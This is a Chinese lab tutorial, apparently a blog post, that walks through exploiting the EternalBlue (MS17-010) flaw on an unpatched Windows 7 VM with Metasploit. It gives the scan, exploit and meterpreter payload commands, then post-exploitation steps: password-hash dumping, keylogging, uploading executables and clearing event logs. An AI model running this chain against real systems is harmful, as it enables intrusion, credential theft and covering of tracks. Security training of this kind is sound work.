目录

  1. Metaploit介绍
  2. 实验环境
  3. 漏洞利用过程

Metaploit介绍

  本次测试主要是利用永恒之蓝漏洞对windows7进行控制利用,掌握Metaploit工具的使用,知道永恒之蓝的漏洞利用原理。永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

  进入metaploit命令:msfconsole,可以看出下面有总共有六个模块,辅助模块(auxiliary)、渗透攻击模块(exploits)、后渗透攻击模块(post)、攻击载荷模块(payloads)、空指令模块(nops)、编码器模块(encoders),其中msf为总模块,其他均为分支模块。


实验环境

攻击机:192.168.202.132  (Kali安装Metaploit工具)

靶机:192.168.202.131 (windows7x64未打永恒之蓝补丁且关闭防火墙)


实战漏洞利用

1.进入metaploit工具使用命令:msfconsole,可以看出下面有总共有六个模块,不同的模块功能使用的侧重点一样,在进行不同的探测之前使用不同的模块。

辅助模块(auxiliary)、渗透攻击模块(exploits)、后渗透攻击模块(post)、攻击载荷模块(payloads)、空指令模块(nops)、编码器模块(encoders),其中msf为总模块,其他均为分支模块。Metaploit的版本号为metasploit v4.17.3-dev

>>>msfconsole

2.在进行攻击利用之前,首先确实目标是否开放445端口,该漏洞Ms17-010是否存在,先做好简单的信息收集更能成功利用目标主机。

nmap探测主机信息

>>>nmap   -sV   192.168.202.131

====>>>445端口开放,目的主机为windows7系统,推测存在ms17-010漏洞

利用msf的auxiliary模块进行漏洞验证

>>>search ms17-010

搜索有关漏洞的模块,结果看到很多有关该漏洞的不同模块,可以使用auxiliary/scanner/smb/smb_ms17_010 进行验证

>>>use  auxiliary/scanner/smb/smb_ms17_010

>>>set  rhost  192.168.202.131

>>>set  rport   445

配置好之后,使用>>>run 探测一下查看结果存在该漏洞

3.验证存在漏洞之后,就可以利用永恒之蓝漏洞,使用其中的渗透攻击(exploit)模块,对其进行渗透攻击

a.设置攻击目标、端口、本机

>>>use  exploit/windows/smb/ms17_010_eternalblue

b.使用exp进行攻击时,要使用payload作为子弹进行攻击

>>>set  payload   windows/x64/meterpreter/reverse_tcp

c.查看具体配置是否完整

>>>show options

d.进行攻击

>>>run

soga  进去了,看样子差不多可以嘿嘿嘿了*-*

4.进入shell,获取命令行,可以看到直接获得system权限

meterpreter是metasploit框架中的一个扩展模块,作为溢出成功后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个meterpreter shell的链接。

a.从上面看出已经攻入成功,可以输入:sysinfo查看系统信息

meterpreter > sysinfo

b.反弹shell

meterpreter >shell

meterpreter shell作为渗透模块有很多有用的功能,比如:添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS(基于主机的入侵检测系统) 很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。

5.shell利用

(1).新建用户、获得用户密码

a.密码为进入hash加密值,可以利用在线解密进行破解

meterpreter > hashdump

可以看到用户名,密码,hash解码就可以拿到密码了

b.进入shell新建用户

c. 捕捉屏幕:screenhot

到这个路径下查看,可以看到返回的图片

d.获取按键信息

开始获取:keyscan_start

下载内容:keyscan_dump

没有获取到,应该需要在捕获的同时需要进行键盘操作

e.上传文件

“upload”命令为上传文件到靶机下(例如黑客上传一个勒索病毒WannaCry),测试上传了一个hack.exe文件到,可以直接执行

f. 清除事件日志

执行“clearev”命令,将清除事件日志。

Metaploit-永恒之蓝漏洞利用的更多相关文章

  1. EternalBlue永恒之蓝漏洞复现

    EternalBlue漏洞复现 1.    实训目的 永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010.该漏洞利用工具由一个名为”影子经济人”( ...

  2. “永恒之蓝"漏洞的紧急应对--毕业生必看

    早上6点多起床了,第一次起这么早,昨天晚上12点多,看到了一则紧急通知,勒索软件通过微软"永恒之蓝"漏洞针对教育网进行了大规模的攻击,而且有很多同学中招.中招后的结果如下图所示. ...

  3. 【研究】ms17-010永恒之蓝漏洞复现

    1       永恒之蓝漏洞复现(ms17-010) 1.1     漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放44 ...

  4. PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现

    猫宁!!! 参考: https://www.anquanke.com/post/id/86245 https://xz.aliyun.com/t/2536 https://www.cnblogs.co ...

  5. ms17-010-永恒之蓝漏洞利用教程

    实验环境:虚拟机:kali-linux windows 7 请自行下载安装 1.打开虚拟机 启动kali-linux 启动windows7(未装补丁) 2.获取IP地址(ifconfig ipconf ...

  6. Metasploitable3学习笔记--永恒之蓝漏洞复现

    漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不 ...

  7. ms17-010 永恒之蓝漏洞复现(CVE-2017-0143)

    0x01 首先对目标机的开放端口进行探测,我们可以使用探测神器nmap 发现开放的445端口,然后进行下一步的ms17-010的漏洞验证 0x02 打开MSF美少妇神器,用search命令搜索ms17 ...

  8. 使用kali中的Metasploit通过windows7的永恒之蓝漏洞攻击并控制win7系统(9.27 第十三天)

    1.开启postgresql数据库 2.msfconsole 进入MSF中 3.search 17-010 搜索cve17-010相关的exp auxiliary/scanner/smb/smb_ms ...

  9. 永恒之蓝MS17-010漏洞复现

    永恒之蓝MS17-010漏洞复现 1.漏洞描述: 起因: 永恒之蓝(Eternalblue)是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包 ...

随机推荐

  1. [SDOI2019]染色(DP)

    好神的题啊! 看了这题只会第一个subtask,又参考了HN-CJ鸽王zsy的题解,实在太菜了. 暴力转移是O(nc2),很显然没有分.考虑子任务1,2,只需要转移包含已染色格子的列,然后状态数只有O ...

  2. 记一次线上“no such file or directory”问题处理

    事件背景描述:项目是基于docker部署,在使用xxl-job的过程中,需要使用XxlJobLogger.log记录日志(非必须),项目定义日志其日志存储位置/home/logs.任务运行后包找不到文 ...

  3. Spring Boot中@Async的作用

    在Spring中,@Async这个注解用于标记的异步的方法.方法上一旦标记了这个方法,当其它线程调用这个方法时,就会开启一个新的线程去异步处理业务逻辑. 此注解的使用说明: 1.此注解可以用在方法上, ...

  4. 主效应|处理误差 |组间误差|处理效应|随机误差|组内误差|误差|效应分析|方差齐性检验|SSE|SSA|SST|MSE|MSA|F检验|关系系数|完全随机化设计|区组设计|析因分析

    8 什么是只考虑主效应的方差分析? 就是不考虑交互效应的方差分析,即认为因素之间是不相互影响的,就是无重复的方差分析.   什么是处理误差 (treatment error).组间误差(between ...

  5. vue实现tab选项卡切换

    上代码: <template>   <div class="push">     //点击按钮     <div class="tab&qu ...

  6. 高级I/O

    1.阻塞问题的几种解决模型 1.1 非阻塞模型:类似于死循环,需要适当加休眠,防止cpu占用太高:效率较低 1.2 线程异步:效率最高的一种解决方案 1.3 I/O多路转接与复用  select(低) ...

  7. JS替换变量中的文字字母

    var text='Hello world, Hello world'; var b= text.replace('world','zhengxiaoya'); // 找到字符串中的第一个'world ...

  8. Jmeter之压力测试总结

    一.基本概念 1.线程组N:代表一定数量的并发用户,所谓并发就是指同一时刻访问发送请求的用户.线程组就是模拟并发用户访问. 2.Ramp-Up Period(in seconds):建立所有线程的周期 ...

  9. deeplearning.ai 序列模型 Week 2 NLP & Word Embeddings

    1. Word representation One-hot representation的缺点:把每个单词独立对待,导致对相关词的泛化能力不强.比如训练出“I want a glass of ora ...

  10. JarvisOJ level3_x64

    这一题是和前面x86的差不多,都是利用了同一个知识点,唯一的区别就是使用的堆栈地址不同,x86是直接使用堆栈来传递参数的,而x64不同 x64的函数调用时整数和指针参数按照从左到右的顺序依次保存在寄存 ...